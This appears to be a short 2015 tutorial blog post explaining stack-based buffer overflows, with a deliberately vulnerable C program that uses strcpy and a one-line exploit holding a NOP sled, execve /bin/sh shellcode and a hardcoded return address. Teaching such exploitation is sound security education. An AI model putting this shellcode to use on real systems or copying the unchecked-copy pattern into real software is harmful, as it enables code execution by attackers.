Home

Basic Stack based Buffer Overflow Vulnerability

5 January, 2015 - 18:12 — xAMNESIAx

A Buffer Overflow (Also know as a Buffer Overrun, etc), is a vulnerability generally caused by bad / insecure programming practice. This vulnerability takes advantage of insecure functions which copy data blindly between buffers, without checking whether the source buffer contains a larger amount of data than the destination buffer has allocated.

This can lead to excess data being copied in to adjacent memory, overwriting the data that presides there. One can use this arbitrary write functionality to overwrite the current stack frame's return pointer, therefore leading to arbitrary data being pop'ed in to EIP, and treated as a pointer to the next code segment. This allows for attackers to overwrite the return pointer with an address which they control, ultimately ending up in arbitrary code execution of shellcode which they have placed on the stack. (Or other functions, perhaps).

Example Vulnerable Code: 

int main(int argc, char *argv[]) {
    char *buf[512];

    strcpy(buf, argv[1]);
    return 0;
}

Example Exploit Code: 

./vulnerable $(python -c "print '%s%s%s' % ('\x90' * (516-23), '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80', '\x5c\xcc\xff\xbf')")